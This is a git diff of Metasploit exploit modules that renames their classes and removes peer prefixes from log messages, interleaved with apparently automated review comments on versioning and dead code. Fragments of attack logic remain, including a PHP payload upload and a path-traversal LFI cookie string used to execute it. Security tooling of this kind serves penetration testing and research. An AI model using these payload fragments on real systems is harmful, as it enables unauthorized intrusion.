a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 926c665dce..3623fcbd90 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 0a6caf1ee7..9ebc7d42e6 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb 
+++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 5326f8d851..3557828c07 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 184c225c90..5053c21189 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index bafae78d1e..5fde51c927 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 36c43eb15d..6672291ed6 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e3e6f56fad..ee3447c380 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 71a4fd8416..588bab550e 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index f35930adfb..8fabe4bf78 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote sock.close - print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") + print_status("Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index ce6388be3e..49de9d25e1 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index b5a5b70f1f..91eccda718 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index ff6c6bb7a9..746a77a401 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index cb85ffd2a2..2c1e3a00a7 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 8a06f2b6b2..f149a66c21 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index 53f4b48af4..78c51d98f0 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 4fdbb98670..3765e1585b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return Exploit::CheckCode::Unknown end @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote version = $2 build = $1 - vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected") + vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected") else - vprint_status("#{peer} - Unexpected vmtadmin.cgi response") + vprint_status("Unexpected vmtadmin.cgi response") return Exploit::CheckCode::Unknown end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return nil end 
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") end - print_status("#{peer} - Blind Exploitation - unknown exploitation state") + print_status("Blind Exploitation - unknown exploitation state") return end diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index c9a00bc53e..49205040b0 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index 1c7b5c64a6..fc495385bd 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index db1aeb5ba1..fb4c775800 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 6a4c335ca5..c46bbf9295 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb 
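Review bot: The context line `fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")` in the `@@ -140,7 +140,7 @@` hunk of vmturbo_vmtadmin_exec_noauth.rb still builds the peer prefix by hand, while the `print_status` directly below it no longer does. Dropping the prefix from the print_* calls suggests it is now added centrally (inferred; that code is not in this diff), so it is worth confirming whether failure messages take the same path, in which case the peer would appear twice. If they do, `fail_with(Failure::Unknown, 'Unable to execute payload')` keeps both paths consistent; if they do not, a short comment saying why `fail_with` keeps the prefix would help. The same leftover is in the `@@ -230,10 +230,10 @@` hunk of actualanalyzer_ant_cookie_exec.rb, and the enclosing method here starts and ends outside the hunk.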
@@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 9bdeb95f3d..e86a518727 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 1445b92a9c..5b52c215f9 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 64b8255efb..5f5c297d71 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 7498d4486e..f197f52cf8 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index c504ba9392..e2bcac05b5 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index a985514797..429deb28bf 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 02376c7c19..3ba50240b7 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 5c1510028b..1ab9cd26f4 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 8cb29c5e9f..3700edc024 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -65,22 +65,22 @@ class Metasploit3 < Msf::Exploit::Remote # check for aa.php res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error("#{peer} - Could not find aa.php") + vprint_error("Could not find aa.php") return Exploit::CheckCode::Safe elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ - vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + vprint_error("ActualAnalyzer is not installed. Try installing first.") return Exploit::CheckCode::Detected end # check version res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body - vprint_status("#{peer} - Found version: #{version}") + vprint_status("Found version: #{version}") if Gem::Version.new(version) <= Gem::Version.new('2.81') report_vuln( host: rhost, 
@@ -124,12 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on view.php") + vprint_status("Could not find any hosts on view.php") end nil end @@ -146,12 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on code.php") + vprint_status("Could not find any hosts on code.php") end nil end @@ -184,12 +184,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && res.body =~ />Login</ - vprint_status("#{peer} - Login failed.") + vprint_status("Login failed.") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") - print_good("#{peer} - Login successful! (#{user}:#{pass})") + vprint_good("Found analytics host: #{analytics_host}") + print_good("Login successful! (#{user}:#{pass})") service_data = { address: Rex::Socket.getaddress(rhost, true), port: rport, 
@@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote create_credential_login(login_data) return analytics_host else - vprint_status("#{peer} - Could not find any hosts on admin.php") + vprint_status("Could not find any hosts on admin.php") end nil end @@ -230,10 +230,10 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out") elsif res.code == 302 && res.headers['Content-Type'] =~ /image/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") return true elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/ - vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") + vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") elsif res.code == 200 && res.body =~ /Admin area<\/title>/ fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.") else @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote end analytics_hosts.uniq.each do |host| next if host.nil? - vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") + vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") break if execute_command(payload.encoded, analytics_host: host) end end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9b029120b6..2d27a36799 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") + print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "scripts", "upload.php"), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("/tmp/ApplianceUpdate") - print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") + print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end 
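Review bot: `if version > "10.0.10"` in the `@@ -69,14 +69,14 @@` hunk of arkeia_upload_exec.rb compares version strings lexicographically, so "10.0.9" or "9.4" sorts above "10.0.10" and `check` would return `CheckCode::Safe` for a release older than the threshold. The actualanalyzer module in this same diff already compares with `Gem::Version`; here `return Exploit::CheckCode::Safe if Gem::Version.new(version) > Gem::Version.new('10.0.10')` would compare numerically. How `version` is extracted is outside the hunk, so a malformed value may need handling, since `Gem::Version.new` raises `ArgumentError` on one. The same string comparison, `if version > "2.6"`, is in the `@@ -67,7 +67,7 @@` hunk of clipbucket_upload_exec.rb.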
diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index bc273029c4..c047d659b8 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 516bac7a51..b91d673eb6 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index de4f73f6b2..12a82d861e 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index ce3cf84b4a..d334336979 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 574db617bd..48882338b7 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3dcef095f8..748c447481 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 66ab5cdf4e..a91d30bcad 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index 045be447c2..247850e4b8 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb index 66e4aed547..108a21e443 100644 
--- a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb +++ b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index 0e8aad113d..30434c954c 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 55abc7908c..538cc64d7a 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe 
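Review bot: The context line `peer = "#{rhost}:#{rport}"` in the `@@ -54,7 +54,7 @@` hunk of clipbucket_upload_exec.rb is no longer read by the `vprint_status` that follows it, so within the visible lines the local is now dead. It also shadows whatever `peer` the other modules in this diff call without defining, which looks like a mixin method (inferred). If nothing later in `check` reads it (the method continues outside the hunk), delete the assignment. The same line appears in the `@@ -82,7 +82,7 @@` hunk of this file.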
